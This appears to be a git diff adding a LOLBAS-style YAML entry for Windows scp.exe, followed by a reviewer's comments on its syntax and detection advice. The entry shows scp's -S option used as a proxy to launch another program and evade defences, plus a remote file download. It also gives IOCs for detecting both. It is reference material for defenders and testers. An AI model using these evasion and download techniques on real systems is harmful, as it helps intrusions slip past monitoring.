diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml new file mode 100644 index 0000000..f3b584b --- /dev/null +++ b/yml/OSBinaries/scp.yml @@ -0,0 +1,28 @@ +--- +Name: scp.exe +Description: Secure Copy Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:' + Description: Execute notepad.exe with scp.exe as parent process + Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128: " + Description: Download file with scp.exe from am SSH server + Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\scp.exe +Detection: + - IOC: scp.exe spawning unexpected processes + - IOC: Suspicious SSH internet/network traffic +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0'
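Review bot: the second command `scp @192.168.187.128: ` is not a working download as written: the user name before `@` is empty, the remote path after the `:` is empty, and there is no local destination argument, so it does not match the "Download file" description beside it. Spell it out with labelled placeholders, for example `scp user@192.168.187.128:file.txt .`, so readers copy a form that actually transfers a file. In the same entry, "from am SSH server" should read "from an SSH server". Two smaller points: the Full_Path value `c:\windows\system32\OpenSSH\scp.exe` mixes cases within one path and would read better as `C:\Windows\System32\OpenSSH\scp.exe`; and the first IOC, "scp.exe spawning unexpected processes", could be made concrete for the `-S` technique the first command shows, e.g. "scp.exe spawning a child process other than ssh.exe", since `-S` replaces the ssh program scp would normally launch and that parent/child pair is the stable signal defenders can alert on.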